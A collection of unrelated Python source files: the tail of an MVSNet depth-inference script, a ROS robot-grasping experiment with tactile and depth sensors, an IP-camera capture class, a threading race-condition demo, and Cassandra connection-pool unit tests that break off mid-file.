squeeze output out_init_depth_image = np.squeeze(out_init_depth_map) out_prob_map = np.squeeze(out_prob_map) out_ref_image = np.squeeze(out_images) out_ref_image = np.squeeze(out_ref_image[0, :, :, :]) out_ref_cam = np.squeeze(out_cams) out_ref_cam = np.squeeze(out_ref_cam[0, :, :, :]) out_index = np.squeeze(out_index) out_view_comb = np.squeeze(out_view_comb) if mode == 'bf': out_gt_depth = np.squeeze(out_gt_depth) err = np.sqrt(np.mean((out_init_depth_image - out_gt_depth)[out_gt_depth > 0] ** 2)) if out_index == last_img_id and err >= min_err: continue min_err = err last_img_id = out_index print(Notify.INFO, 'Updated minimum RMSE for image %d: %.3f. Supporting views are %s' % (out_index, err, out_view_comb)) # paths init_depth_map_path = output_folder + ('/%08d_init.pfm' % out_index) prob_map_path = output_folder + ('/%08d_prob.pfm' % out_index) out_ref_image_path = output_folder + ('/%08d.jpg' % out_index) out_ref_cam_path = output_folder + ('/%08d.txt' % out_index) view_comb_path = output_folder + ('/%08d_view_comb.npy' % out_index) # save output write_pfm(init_depth_map_path, out_init_depth_image) write_pfm(prob_map_path, out_prob_map) out_ref_image = cv2.cvtColor(out_ref_image, cv2.COLOR_RGB2BGR) image_file = file_io.FileIO(out_ref_image_path, mode='w') scipy.misc.imsave(image_file, out_ref_image) write_cam(out_ref_cam_path, out_ref_cam) np.save(view_comb_path, out_view_comb) def get_subdirs(dir): "Get a list of immediate subdirectories" return next(os.walk(dir))[1] def main(_): # pylint: disable=unused-argument """ program entrance """ mode = 'bf' if mode == 'rnd': np.random.seed(100) # generate input path list scans = get_subdirs(FLAGS.dense_folder) base_output_folder = FLAGS.output_folder for scan in scans: print('scan : ', scan) mvs_list = gen_pipeline_mvs_list(os.path.join(FLAGS.dense_folder, scan), mode) FLAGS.output_folder = os.path.join(base_output_folder, scan) # mvsnet inference p = multiprocessing.Process(target=mvsnet_pipeline, args=(mvs_list, mode)) p.start() p.join() if __name__ == '__main__': tf.app.run()
randomized_search_2_recorded.py
#!/usr/bin/env python # Compatibility Python 2/3 from __future__ import division, print_function, absolute_import from builtins import range # ---------------------------------------------------------------------------------------------------------------------- import grip_and_record.inverse_kin from geometry_msgs.msg import ( PoseStamped, Pose, Point, Quaternion, ) from data_recorder import DataRecorder import data_recorder as dr from grip_and_record.robot_utils import Orientations import rospy import intera_interface from intera_interface import CHECK_VERSION from intera_interface import ( Gripper, Lights, Cuff, RobotParams, ) import numpy as np from transform import transform import time import grip_and_record.getch import grip_and_record.locate_cylinder import os import matplotlib.pyplot as plt from KinectA import KinectA from KinectB import KinectB import logging import threading from GelSightA import GelSightA from GelSightB import GelSightB import WSG50_manu import tensorflow_model_is_gripping.press as press import pylab import cv2 import time import random import multiprocessing import tensorflow_model_is_gripping.aolib.util as ut import tensorflow_model_is_gripping.grasp_net import tensorflow_model_is_gripping.grasp_params import tensorflow_model_is_gripping.aolib.img as ig import data_recorder as dr logger = logging.getLogger() logger.setLevel(logging.DEBUG) # To log file fh = logging.FileHandler('run_experiment.log') fh.setLevel(logging.DEBUG) logger.addHandler(fh) ############################### # Parameters experiment ############################### COMPUTE_BG = False # Store a new background image bounds_table = np.array([[0.45, 0.65], [-0.25, 0.25]]) # X(min, max), Y(min, max) # TODO: this is too small!!! grasping_force = [4, 25] # min, max of the force [N] applied by the gripper when trying to grasp the object xyz_bias = [+0.01, -0.02, 0] # bias to compensate for sawyer-kinect calibration inaccuracies # NAMEOBJECT = 'soft_blue_hexagon' # NAMEOBJECT = 'jasmine_tea' # NAMEOBJECT = '3d_printed_screw' # NAMEOBJECT = 'yellow_berkeley_mug' # NAMEOBJECT = 'wired_pen_container' # NAMEOBJECT = 'glass_container_spices' # NAMEOBJECT = 'staples_box' # NAMEOBJECT = 'logitech_mouse' # NAMEOBJECT = 'mini_vase' # NAMEOBJECT = 'coconut_te0a_box' # NAMEOBJECT = 'calcium_antacid' # NAMEOBJECT = "monster_truck" NAMEOBJECT = "ogx_shampoo" THRESHOLD_GRASPING = 0.9 # Choose modality for prediction images_only = False gel_and_images = not images_only ############################### # Parameters Gripper ############################### # Gelsight adaptor v1 # lower_bound_z = 0.21 # When using the v1 of the weiss_gelsight_adaptor (the short one, with large grasp) # height_gripper = 0.08 # v1 of the weiss_gelsight_adaptor # Gelsight adaptor v2 lower_bound_z = 0.245 # When using the v2 of the weiss_gelsight_adaptor (the tall one, with smaller grasp) height_gripper = 0.11 # v2 of the weiss_gelsight_adaptor ############################### def orientation_downward(angle): """ Return the quaternion for the gripper orientation :param angle: [rad] :return: """ angle = np.remainder(angle, np.pi) # Remap any angle to [0, +pi] orientation = Quaternion( x=1, y=angle, z=0, w=0, ) return orientation def sample_from_cylinder(xy, height_object=0.25, radius=0.1): """ Randomly sample a grasping position from a cylinder :param xy: x,y coordinates of the base/center of the cylinder :param height_object: height of the cylinder :param radius: radius of the cylinder :return: """ approach = 2 xy = np.array(xy) # TODO: assert things are the right dimension if approach == 1: # Approach 1: sample two points from the circumference, and the grasp is the line connecting them angles = np.random.uniform(0, 2 * np.pi, 2) # sample 2 points in terms of angles [rad] xy_points = xy + [radius * np.sin(angles), radius * np.cos(angles)] # convert them to xy position # compute line between points and corresponding EE position des_xy = np.sum(xy_points, 0) / 2 # Middle point angle_gripper = np.pi / 2 + (np.pi - (angles[1] - angles[0]) / 2) + angles[ 0] # TODO: compute angle gripper y = ax + b # rp.log_message('Moving to x=%f y=%f z=%f' % (des_xy[0], des[1], xyz[2])) angle_gripper = 0 orientation = orientation_downward(angle=angle_gripper) xyz = np.array([des_xy[0], des_xy[1], 0.25]) # fix height if approach == 2: # Approach 2: directly sample angle and shift xy_noise = 0.001 shift = np.random.uniform(low=-xy_noise, high=xy_noise, size=3) shift_z_min = np.maximum(0.01, height_object - height_gripper) # make sure that we don't hit with the gripper shift_z_max = height_object - 0.015 # small bias to avoid grasping air shift[2] = np.random.uniform(low=shift_z_min, high=shift_z_max) shift[2] = np.maximum(0, shift[2]) # Just for safety print('Z = [%f,%f] => %f' % (shift_z_min, shift_z_max, shift[2])) xyz = np.array([xy[0], xy[1], lower_bound_z]) + shift + xyz_bias orientation = orientation_downward(angle=np.random.uniform(0, np.pi)) return xyz, orientation def wait_for_key(): rp = intera_interface.RobotParams() # For logging rp.log_message("Press ESC to continue...") done = False while not done and not rospy.is_shutdown(): c = grip_and_record.getch.getch() if c: if c in ['\x1b', '\x03']: done = True ############################### class grasper(): def __init__(self, nameObject=''): self.rp = intera_interface.RobotParams() # For logging self.rp.log_message('') print('Make sure the correct object is printed below.') print('Object: %s' % nameObject) self.nameObject = nameObject # Make required initiations self.limb_name = "right" self.limb = None self.init_robot() self.gripper = self.init_gripper() # Requesting to start topics for KinectA self.rp.log_message('Launch topics for KinectA') self.rp.log_message('Please run the following command in a new terminal (in intera mode):') self.rp.log_message('rosrun kinect2_bridge kinect2_bridge') self.rp.log_message('') # Requesting to start topics for KinectB self.rp.log_message('Launch topics for KinectB') self.rp.log_message( 'Please run the following command in a new terminal (in intera mode) on the kinectbox02 (ssh):') # rp.log_message('ssh k2') # rp.log_message('for pid in $(ps -ef | grep "kinect2_bridge" | awk "{print $2}"); do kill -9 $pid; done') self.rp.log_message('/home/rail/ros_ws/src/manu_kinect/start_KinectB.sh') self.rp.log_message('') # Start Topic for the Gelsight self.rp.log_message('Launch topic for GelsightA') self.rp.log_message('Please run the following command in a new terminal (in intera mode):') self.rp.log_message('roslaunch manu_sawyer gelsightA_driver.launch') self.rp.log_message('') self.rp.log_message('Launch topic for GelsightB') self.rp.log_message('Please run the following command in a new terminal (in intera mode):') self.rp.log_message('roslaunch manu_sawyer gelsightB_driver.launch') self.gelSightA = GelSightA() self.gelSightB = GelSightB() self.kinectA = KinectA(save_init=COMPUTE_BG) self.kinectB = KinectB() time.sleep(1) # Requests the user to place the object to be griped on the table. self.rp.log_message('Place the object to grasp on the table.') wait_for_key() self.start_experiment() # Start grasping the object def init_robot(self): epilog = """ See help inside the example with the '?' key for key bindings. """ valid_limbs = self.rp.get_limb_names() if not valid_limbs: self.rp.log_message(("Cannot detect any limb parameters on this robot. " "Exiting."), "ERROR") return self.rp.log_message('Initializing node... ') rospy.init_node("move_and_grip") self.rp.log_message('Getting robot state... ') self.rs = intera_interface.RobotEnable(CHECK_VERSION) init_state = self.rs.state().enabled def clean_shutdown(): print("\nExiting example.") if not init_state: self.rp.log_message('Disabling robot...') self.rs.disable() rospy.on_shutdown(clean_shutdown) rospy.loginfo("Enabling robot...") self.rs.enable() if not self.limb_name in valid_limbs: self.rp.log_message(("Right is not a valid limb on this robot. " "Exiting."), "ERROR") return limb = intera_interface.Limb(self.limb_name) limb.set_joint_position_speed(0.15) self.limb = limb # Move to a safe position self.goto_rest_pos() def init_gripper(self): # Requesting to start topics for gripper self.rp.log_message('Launch topics for gripper') self.rp.log_message('Please run the following command in a new terminal:') self.rp.log_message('roslaunch wsg_50_driver wsg_50_tcp_script.launch') return WSG50_manu.WSG50() def goto_randomized_grasping_location(self): # Randomize grasping location # move arm there: self.goto_EE_xyz() pass def orientation_downward(self, angle): """ Return the quaternion for the gripper orientation :param angle: [rad] :return: """ angle = np.remainder(angle, np.pi) # Remap any angle to [0, +pi] orientation = Quaternion( x=1, y=angle, z=0, w=0, ) return orientation def goto_rest_pos(self, verbosity=1): """ Move the arm to a safe rest position :param limb: link to the limb being used :param blocking: Bool. is it a blocking operation? (ie., do we wait until the end of the operation?) :param verbosity: verbosity level. >0 print stuff :return: """ xyz_rest = [0.50, 0.50, 0.60] if verbosity > 0: self.rp.log_message('Moving to rest position') self.goto_EE_xyz(xyz=xyz_rest, orientation=Orientations.DOWNWARD_ROTATED, verbosity=verbosity - 1, rest_pos=True) def goto_EE_xyz(self, xyz, orientation=Orientations.DOWNWARD_ROTATED, verbosity=1, rest_pos=False): """ Move the End-effector to the desired XYZ position and orientation, using inverse kinematic :param limb: link to the limb being used :param xyz: list or array [x,y,z] with the coordinates in XYZ positions in limb reference frame :param orientation: :param verbosity: verbosity level. >0 print stuff :return: """ try: if verbosity > 0: self.rp.log_message('Moving to x=%f y=%f z=%f' % (xyz[0], xyz[1], xyz[2])) if not rest_pos: # Make sure that the XYZ position is valid, and doesn't collide with the cage assert (xyz[0] >= bounds_table[0, 0]) and (xyz[0] <= bounds_table[0, 1]), 'X is outside of the bounds' assert (xyz[1] >= bounds_table[1, 0]) and (xyz[1] <= bounds_table[1, 1]), 'Y is outside of the bounds' assert (xyz[2] >= lower_bound_z), 'Z is outside of the bounds' des_pose = grip_and_record.inverse_kin.get_pose(xyz[0], xyz[1], xyz[2], orientation) curr_pos = self.limb.joint_angles() # Measure current position joint_positions = grip_and_record.inverse_kin.get_joint_angles(des_pose, self.limb.name, curr_pos, use_advanced_options=True) # gets joint positions self.limb.move_to_joint_positions(joint_positions) # Send the command to the arm except UnboundLocalError: pose_dict = self.limb.endpoint_pose() pose_pos = pose_dict['position'] current_xyz = [pose_pos.x, pose_pos.y, pose_pos.z] halfway_xyz = ((np.array(xyz) + np.array(current_xyz)) / 2.0).tolist() if np.linalg.norm(np.array(current_xyz) - np.array(halfway_xyz)) > 0.00001: time.sleep(0.2) if rest_pos: self.goto_EE_xyz(halfway_xyz, orientation, rest_pos=True) self.goto_EE_xyz(xyz, orientation, rest_pos=True) else: self.goto_EE_xyz(halfway_xyz, orientation) self.goto_EE_xyz(xyz, orientation) else: print("WoooOooOW") self.goto_EE_xyz([0.60, 0.0, 0.40], orientation, rest_pos=True) def predict_grasping_success(self, gel0_pre, gel1_pre, gel0_post, gel1_post, im0_pre, im0_post, depth0_pre, depth0_post): if images_only: net_pr = tensorflow_model_is_gripping.grasp_params.im_fulldata_v5() checkpoint_file = '/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/net.tf-6499' elif gel_and_images: net_pr = tensorflow_model_is_gripping.grasp_params.gel_im_fulldata_v5() checkpoint_file = '/home/manu/ros_ws/src/manu_research/manu_sawyer/src/tensorflow_model_is_gripping/training/full/net.tf-6499' gpu = '/gpu:0' # sc = lambda x: ig.scale(x, (224, 224)) def sc(x): """ do a center crop (helps with gelsight) """ x = ig.scale(x, (256, 256)) return ut.crop_center(x, 224) crop = tensorflow_model_is_gripping.grasp_net.crop_kinect inputs = dict( gel0_pre=sc(gel0_pre), gel1_pre=sc(gel1_pre), gel0_post=sc(gel0_post), gel1_post=sc(gel1_post), im0_pre=sc(crop(im0_pre)), im0_post=sc(crop(im0_post)), depth0_pre=sc(crop(depth0_pre.astype('float32'))), depth0_post=sc(crop(depth0_post.astype('float32')))) net = tensorflow_model_is_gripping.grasp_net.NetClf(net_pr, checkpoint_file, gpu) prob = net.predict(**inputs) print("Probability: ", prob[1]) return prob[1] def obj_func(self, x): """ This is the function that evaluate the objective function, ie, the goodness of the grasping :param x: np.array of parameters to evaluate [EE_x,EE_y,EE_z,orientation,graspingforce] :return: """ # Unpack parameters des_xyz = x[0:3] des_EE_xyz_above = des_xyz + np.array([0, 0, 0.2]) des_orientation = self.orientation_downward(x[3]) des_grasping_force = x[4] # Goto desired grasp position above # self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) # Get image from GelSight # GelSightA gelA_img_r_ini = self.gelSightA.get_image() gelA_img_r_ini = cv2.cvtColor(gelA_img_r_ini, cv2.COLOR_BGR2RGB) # GelSightB gelB_img_r_ini = self.gelSightB.get_image() gelB_img_r_ini = cv2.cvtColor(gelB_img_r_ini, cv2.COLOR_BGR2RGB) gel0_pre = gelA_img_r_ini gel1_pre = gelB_img_r_ini im0_pre = cv2.cvtColor(self.kinectA.get_color_image(), cv2.COLOR_BGR2RGB) depth0_pre = self.kinectA.get_depth_image() # Goto desired grasp position self.goto_EE_xyz(xyz=des_xyz, orientation=des_orientation) self.limb.set_joint_position_speed(0.12) # Attempt grasp self.grasp_object(force=des_grasping_force) time.sleep(2) gelA_img_r = self.gelSightA.get_image() gelA_img_r = cv2.cvtColor(gelA_img_r, cv2.COLOR_BGR2RGB) gelB_img_r = self.gelSightB.get_image() gelB_img_r = cv2.cvtColor(gelB_img_r, cv2.COLOR_BGR2RGB) gel0_post = gelA_img_r gel1_post = gelB_img_r im0_post = cv2.cvtColor(self.kinectA.get_color_image(), cv2.COLOR_BGR2RGB) depth0_post = self.kinectA.get_depth_image() # Predict goodness grasp out = self.predict_grasping_success(gel0_pre, gel1_pre, gel0_post, gel1_post, im0_pre, im0_post, depth0_pre, depth0_post) return out def reset_gripper(self, x): # des_xyz = x[0:3] # des_EE_xyz_above = des_xyz + np.array([0, 0, 0.2]) # des_orientation = self.orientation_downward(x[3]) self.gripper.open(speed=80) # Open gripper time.sleep(0.5) # self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) def attempt_lift_(self, x): des_xyz = x[0:3] des_EE_xyz_above = des_xyz + np.array([0, 0, 0.2]) des_orientation = self.orientation_downward(x[3]) self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) time.sleep(4) self.goto_EE_xyz(xyz=des_xyz + np.array([0, 0, 0.02]), orientation=des_orientation) self.gripper.open(speed=100) time.sleep(0.5) self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation) def grasp_object(self, force): """ Close the gripper to grasp an object, up to the desired gasping force. :param gripper: :return: """ print("Setting gripping force:", force) self.gripper.set_force(force) self.gripper.graspmove_nopending(width=5, speed=80) time.sleep(2) gripper_force = self.gripper.get_force() print("Getting gripping force:", gripper_force) def start_experiment(self): fig, ((ax1, ax2), (ax3, ax4)) = plt.subplots(2, 2) # Fit a cylinder around the object with the Kinect and get location, etc. self.rp.log_message('Waiting for Kinect to stabilize') time.sleep(1) self.rp.log_message('Done') xyz_kinect, height_object, radius, obj_vis = self.kinectA.calc_object_loc() # Gettig image from KinectB top_img = self.kinectB.get_color_image() top_img = cv2.cvtColor(top_img, cv2.COLOR_BGR2RGB) # Get image from GelSight # GelSightA gelA_img_r_ini = self.gelSightA.get_image() gelA_img_r_ini = cv2.cvtColor(gelA_img_r_ini, cv2.COLOR_BGR2RGB) # GelSightB gelB_img_r_ini = self.gelSightB.get_image() gelB_img_r_ini = cv2.cvtColor(gelB_img_r_ini, cv2.COLOR_BGR2RGB) # Plot result from Kinect for visualisation of fitted cylinder # Plot pic from GelSight kinA_img = ax1.imshow(obj_vis) kinB_img = ax2.imshow(top_img) gelA_img = ax3.imshow(gelA_img_r_ini) gelB_img = ax4.imshow(gelB_img_r_ini) ax1.axis('off') ax2.axis('off') ax3.axis('off') ax4.axis('off') plt.draw() plt.ion() plt.show() # ---------------------------------------------------------------------------------- # Transform from Kinect coordinates to Sawyer coordinates xyz_sawyer = transform(xyz_kinect[0], xyz_kinect[1], xyz_kinect[2]).reshape(3) # Sample randomized gripper position based on the fitted cylinder data des_EE_xyz, des_orientation_EE = sample_from_cylinder(xyz_sawyer[0:2], height_object, radius) data_recorder = DataRecorder(limb=self.limb, gripper=self.gripper, GelSightA=self.gelSightA, GelSightB=self.gelSightB, KinectA=self.kinectA, KinectB=self.kinectB) # Initialize recording to file nameFile = time.strftime("%Y-%m-%d_%H%M%S") + "_randomized_search_2" frequency = 30 thread = threading.Thread(target=data_recorder.init_record, args=(nameFile, frequency)) thread.start() time.sleep(0.2) from multiprocessing.pool import ThreadPool pool = multiprocessing.pool.ThreadPool(processes=1) des_EE_xyz_above = des_EE_xyz + np.array([0, 0, 0.2]) self.goto_EE_xyz(xyz=des_EE_xyz_above, orientation=des_orientation_EE) self.limb.set_joint_position_speed(0.08) force = np.random.uniform(grasping_force[0], grasping_force[1]) x = [des_EE_xyz[0], des_EE_xyz[1], des_EE_xyz[2], des_orientation_EE.y, force] # Initial guess by the Kinect # =========================================================================================================== path = "/home/manu/ros_ws/src/manu_research/data/" file = open(path + nameFile + '.txt', 'w') file.write("Object name: " + NAMEOBJECT + "\n") file.write("Image_and_Gel: " + str(gel_and_images) + "\n") file.write("Image_only: " + str(images_only) + "\n") # # Randomize grasping location # Start optimization grasp # promising_attempt = False while True: # Predict grasping success grasping_success = self.obj_func(x) file.write(str(x) + " " + str(grasping_success) + "\n") # Decide what to do if grasping_success > THRESHOLD_GRASPING: self.attempt_lift_(x) break else: self.reset_gripper(x) noise = 0.003 delta_xyz = np.random.uniform(low=-noise, high=noise, size=3) delta_z_min = np.maximum(0.01, height_object - height_gripper) delta_z_max = height_object - 0.015 delta_xyz[2] = np.random.uniform(low=delta_z_min, high=delta_z_max) delta_xyz[2] = np.maximum(0, delta_xyz[2]) # Just for safety des_EE_xyz = np.array([des_EE_xyz[0], des_EE_xyz[1], lower_bound_z]) + delta_xyz angle = np.random.uniform(0, np.pi) force = np.random.uniform(grasping_force[0], grasping_force[1]) x = [des_EE_xyz[0], des_EE_xyz[1], des_EE_xyz[2], angle, force] # =========================================================================================================== # Stop recording data for this iteration data_recorder.stop_record() thread.join() comp_task = dr.CompressionTask(data_recorder, pool) comp_task.run_sync() # data_recorder.end_processes() print("Was it a successful grasp? [y/n]") done = False while not done: c = grip_and_record.getch.getch() if c: if c in ['n']: successful = False done = True elif c in ['y']: successful = True done = True file.write("Successful attempt: " + str(successful)) file.close() rospy.signal_shutdown("Example finished.") if __name__ == '__main__': grasper(nameObject=NAMEOBJECT)
Camera.py
# Camera Class # Brandon Joffe # 2016 # # Copyright 2016, Brandon Joffe, All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import threading import time import numpy as np import cv2 import cv2.cv as cv import ImageUtils import dlib import openface import os import argparse import logging import SurveillanceSystem import MotionDetector import FaceDetector import pdb #logging.basicConfig(level=logging.DEBUG, # format='(%(threadName)-10s) %(message)s', # ) logger = logging.getLogger(__name__) fileDir = os.path.dirname(os.path.realpath(__file__)) modelDir = os.path.join(fileDir, '..', 'models') dlibModelDir = os.path.join(modelDir, 'dlib') openfaceModelDir = os.path.join(modelDir, 'openface') parser = argparse.ArgumentParser() parser.add_argument('--networkModel', type=str, help="Path to Torch network model.", default=os.path.join(openfaceModelDir, 'nn4.small2.v1.t7')) parser.add_argument('--imgDim', type=int, help="Default image dimension.", default=96) parser.add_argument('--cuda', action='store_true') args = parser.parse_args() CAPTURE_HZ = 30.0 # Determines frame rate at which frames are captured from IP camera class IPCamera(object): """The IPCamera object continually captures frames from a camera and makes these frames available for proccessing and streamimg to the web client. A IPCamera can be processed using 5 different processing functions detect_motion, detect_recognise, motion_detect_recognise, segment_detect_recognise, detect_recognise_track. These can be found in the SureveillanceSystem object, within the process_frame function""" def __init__(self,camURL, cameraFunction, dlibDetection, fpsTweak): logger.info("Loading Stream From IP Camera: " + camURL) self.motionDetector = MotionDetector.MotionDetector() self.faceDetector = FaceDetector.FaceDetector() self.processing_frame = None self.tempFrame = None self.captureFrame = None self.streamingFPS = 0 # Streaming frame rate per second self.processingFPS = 0 self.FPSstart = time.time() self.FPScount = 0 self.motion = False # Used for alerts and transistion between system states i.e from motion detection to face detection self.people = {} # Holds person ID and corresponding person object self.trackers = [] # Holds all alive trackers self.cameraFunction = cameraFunction self.dlibDetection = dlibDetection # Used to choose detection method for camera (dlib - True vs opencv - False) self.fpsTweak = fpsTweak # used to know if we should apply the FPS work around when you have many cameras self.rgbFrame = None self.faceBoxes = None self.captureEvent = threading.Event() self.captureEvent.set() self.peopleDictLock = threading.Lock() # Used to block concurrent access to people dictionary # pdb.set_trace() self.video = cv2.VideoCapture(camURL) # VideoCapture object used to capture frames from IP camera logger.info("We are opening the video feed.") self.url = camURL if not self.video.isOpened(): self.video.open() logger.info("Video feed open.") print("Video feed open.") self.dump_video_info() # logging every specs of the video feed # Start a thread to continuously capture frames. # The capture thread ensures the frames being processed are up to date and are not old self.captureLock = threading.Lock() # Sometimes used to prevent concurrent access self.captureThread = threading.Thread(name='video_captureThread',target=self.get_frame) self.captureThread.daemon = True self.captureThread.start() self.captureThread.stop = False # pdb.set_trace() print("We in IP Camera, end of init") def __del__(self): self.video.release() def get_frame(self): logger.debug('Getting Frames') FPScount = 0 warmup = 0 #fpsTweak = 0 # set that to 1 if you want to enable Brandon's fps tweak. that break most video feeds so recommend not to FPSstart = time.time() while True: success, frame = self.video.read() self.captureEvent.clear() if success: self.captureFrame = frame self.captureEvent.set() FPScount += 1 if FPScount == 5: self.streamingFPS = 5/(time.time() - FPSstart) FPSstart = time.time() FPScount = 0 if self.fpsTweak: if self.streamingFPS != 0: # If frame rate gets too fast slow it down, if it gets too slow speed it up if self.streamingFPS > CAPTURE_HZ: time.sleep(1/CAPTURE_HZ) else: time.sleep(self.streamingFPS/(CAPTURE_HZ*CAPTURE_HZ)) def read_jpg(self): """We are using Motion JPEG, and OpenCV captures raw images, so we must encode it into JPEG in order to stream frames to the client. It is nessacery to make the image smaller to improve streaming performance""" capture_blocker = self.captureEvent.wait() frame = self.captureFrame frame = ImageUtils.resize_mjpeg(frame) ret, jpeg = cv2.imencode('.jpg', frame) return jpeg.tostring() def read_frame(self): capture_blocker = self.captureEvent.wait() frame = self.captureFrame return frame def read_processed(self): frame = None with self.captureLock: frame = self.processing_frame while frame == None: # If there are problems, keep retrying until an image can be read. with self.captureLock: frame = self.processing_frame frame = ImageUtils.resize_mjpeg(frame) ret, jpeg = cv2.imencode('.jpg', frame) return jpeg.tostring() def dump_video_info(self): logger.info("---------Dumping video feed info---------------------") logger.info("Position of the video file in milliseconds or video capture timestamp: ") logger.info(self.video.get(cv.CV_CAP_PROP_POS_MSEC)) logger.info("0-based index of the frame to be decoded/captured next: ") logger.info(self.video.get(cv.CV_CAP_PROP_POS_FRAMES)) logger.info("Relative position of the video file: 0 - start of the film, 1 - end of the film: ") logger.info(self.video.get(cv.CV_CAP_PROP_POS_AVI_RATIO)) logger.info("Width of the frames in the video stream: ") logger.info(self.video.get(cv.CV_CAP_PROP_FRAME_WIDTH)) logger.info("Height of the frames in the video stream: ") logger.info(self.video.get(cv.CV_CAP_PROP_FRAME_HEIGHT)) logger.info("Frame rate:") logger.info(self.video.get(cv.CV_CAP_PROP_FPS)) logger.info("4-character code of codec.") logger.info(self.video.get(cv.CV_CAP_PROP_FOURCC)) logger.info("Number of frames in the video file.") logger.info(self.video.get(cv.CV_CAP_PROP_FRAME_COUNT)) logger.info("Format of the Mat objects returned by retrieve() .") logger.info(self.video.get(cv.CV_CAP_PROP_FORMAT)) logger.info("Backend-specific value indicating the current capture mode.") logger.info(self.video.get(cv.CV_CAP_PROP_MODE)) logger.info("Brightness of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_BRIGHTNESS)) logger.info("Contrast of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_CONTRAST)) logger.info("Saturation of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_SATURATION)) logger.info("Hue of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_HUE)) logger.info("Gain of the image (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_GAIN)) logger.info("Exposure (only for cameras).") logger.info(self.video.get(cv.CV_CAP_PROP_EXPOSURE)) logger.info("Boolean flags indicating whether images should be converted to RGB.") logger.info(self.video.get(cv.CV_CAP_PROP_CONVERT_RGB)) logger.info("--------------------------End of video feed info---------------------")
naive_count.py
import threading def thread_plus(name): global data for _ in range(100_000): data += 1 if __name__ == "__main__": data = 0 threads = list() for index in range(10): x = threading.Thread(target=thread_plus, args=(index,)) threads.append(x) x.start() for h in threads: h.join() print(data)
test_host_connection_pool.py
try: import unittest2 as unittest except ImportError: import unittest # noqa from mock import Mock, NonCallableMagicMock from threading import Thread, Event from cassandra.cluster import Session from cassandra.connection import Connection, MAX_STREAM_PER_CONNECTION from cassandra.pool import Host, HostConnectionPool, NoConnectionsAvailable, HealthMonitor from cassandra.policies import HostDistance class HostConnectionPoolTests(unittest.TestCase): def make_session(self): session = NonCallableMagicMock(spec=Session, keyspace='foobarkeyspace') session.cluster.get_core_connections_per_host.return_value = 1 session.cluster.get_max_requests_per_connection.return_value = 1 session.cluster.get_max_connections_per_host.return_value = 1 return session def test_borrow_and_return(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) c = pool.borrow_connection(timeout=0.01) self.assertIs(c, conn) self.assertEqual(1, conn.in_flight) conn.set_keyspace.assert_called_once_with('foobarkeyspace') pool.return_connection(conn) self.assertEqual(0, conn.in_flight) self.assertNotIn(conn, pool._trash) def test_failed_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) conn.in_flight = MAX_STREAM_PER_CONNECTION # we're already at the max number of requests for this connection, # so we this should fail self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) def test_successful_wait_for_connection(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) def get_second_conn(): c = pool.borrow_connection(1.0) self.assertIs(conn, c) pool.return_connection(c) t = Thread(target=get_second_conn) t.start() pool.return_connection(conn) t.join() self.assertEqual(0, conn.in_flight) def test_all_connections_trashed(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn session.cluster.get_core_connections_per_host.return_value = 1 # manipulate the core connection setting so that we can # trash the only connection pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.get_core_connections_per_host.return_value = 0 pool._maybe_trash_connection(conn) session.cluster.get_core_connections_per_host.return_value = 1 submit_called = Event() def fire_event(*args, **kwargs): submit_called.set() session.submit.side_effect = fire_event def get_conn(): c = pool.borrow_connection(1.0) self.assertIs(conn, c) self.assertEqual(1, conn.in_flight) conn.set_keyspace.assert_called_once_with('foobarkeyspace') pool.return_connection(c) t = Thread(target=get_conn) t.start() submit_called.wait() self.assertEqual(1, pool._scheduled_for_creation) session.submit.assert_called_once_with(pool._create_new_connection) # now run the create_new_connection call pool._create_new_connection() t.join() self.assertEqual(0, conn.in_flight) def test_spawn_when_at_max(self): host = Mock(spec=Host, address='ip1') session = self.make_session() conn = NonCallableMagicMock(spec=Connection, in_flight=0, is_defunct=False, is_closed=False) session.cluster.connection_factory.return_value = conn # core conns = 1, max conns = 2 session.cluster.get_max_connections_per_host.return_value = 2 pool = HostConnectionPool(host, HostDistance.LOCAL, session) session.cluster.connection_factory.assert_called_once_with(host.address) pool.borrow_connection(timeout=0.01) self.assertEqual(1, conn.in_flight) # make this conn full conn.in_flight = MAX_STREAM_PER_CONNECTION # we don't care about making this borrow_connection call succeed for the # purposes of this test, as long as it results in a new connection # creation being scheduled self.assertRaises(NoConnectionsAvailable, pool.borrow_connection, 0) session.submit.assert_called_once_with(pool._create_new_connection) def test_return_defunct_connection(self): host = 